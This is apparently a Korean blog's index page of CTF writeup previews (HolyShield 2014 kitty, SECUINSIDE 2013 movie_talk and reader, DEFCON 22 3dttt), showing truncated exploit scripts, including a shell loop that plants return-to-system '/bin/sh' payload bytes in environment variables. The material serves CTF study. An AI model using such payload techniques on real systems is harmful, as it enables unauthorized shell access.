본문 바로가기

Security/[게임] CTF 풀이56

[exploit] 홀리쉴드 2014 kitty writeups =========================== tag : got overwrite, _dl_runtime_resolve import socket import struct import telnetlib host = "192.168.1.22" port = 1120 s = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) s.connect( ( host, port ) ) raw_input( ' go > ' ) def until_recv( st ): buf = '' while st not in buf: buf += s.recv( 1024 ) return buf #### teach #### print until_recv( "select") s.send( '2\n' ).. 2014. 11. 25.

[exploit] 2013 SECUINSIDE movie_talk writeups 해당 바이너리는 로컬환경으로 주어지는 exploit문제입니다. 당시 서버 환경은 ASLR과 NX가 정용되어있는 Ubuntu 13.04버전이었어요!! 로컬에서 ulimit -s unlimited를 입력해주면 라이브러리 주소가 고정되니 참고하시길 !!! ^---^ #!/bin/sh# for RET slide # [ret]*100 [system][system][/bin/sh][/bin/sh]for i in $(seq 1 512); do export a$i="`python -c "print '\x42\x6c\x0b\x40'*100 + '\x10\x8f\x07\x40\x10\x8f\x07\x40' + '\xf4\x74\x17\x40\xf4\x74\x17\x40'"`"; done #!/usr/bin/env pyth.. 2014. 11. 19.

[exploit] 2013 SECUINSIDE reader writeups 아래는 바이너리 파일이고 간단하게 익스플로잇 코드만 올리겠습니다.;D #!/usr/bin/env python import struct p = lambda x: struct.pack( " 2014. 11. 17.

[algorithm] DEFCON 22th 3dttt writeups #!/usr/bin/env python from socket import * import time host = "3dttt_87277cd86e7cc53d2671888c417f62aa.2014.shallweplayaga.me" port = 1234 s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) se = {25:"0,0,0", 29:"1,0,0",33:"2,0,0",53:"0,1,0",57:"1,1,0",61:"2,1,0",\ 81:"0,2,0",85:"1,2,0",89:"2,2,0",119:"0,0,1",123:"1,0,1",127:"2,0,1",\ 147:"0,1,1",151:"1,1,1",155:"2,1,1",175:"0,2,1",179:"1,2,.. 2014. 5. 22.

이전 1 2 3 4 5 6 7 ··· 14 다음

728x90

티스토리툴바